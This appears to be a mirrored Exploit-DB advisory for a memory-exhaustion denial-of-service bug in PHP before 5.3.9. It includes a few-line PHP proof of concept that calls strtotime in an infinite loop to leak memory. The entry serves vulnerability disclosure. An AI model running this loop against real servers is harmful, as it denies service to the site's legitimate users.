PHP 5.3.8 – Remote Denial of Service

  • 作者: anonymous
    日期: 2011-12-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/36789/
  • source: https://www.securityfocus.com/bid/52043/info
    
    PHP is prone to a remote denial-of-service vulnerability.
    
    An attacker can exploit this issue to exhaust available memory, denying access to legitimate users.
    
    PHP versions prior to 5.3.9 are vulnerable. 
    
    <?php
    while (true)
    {
    strtotime('Monday 00:00 Europe/Paris'); // Memory leak
    }
    ?>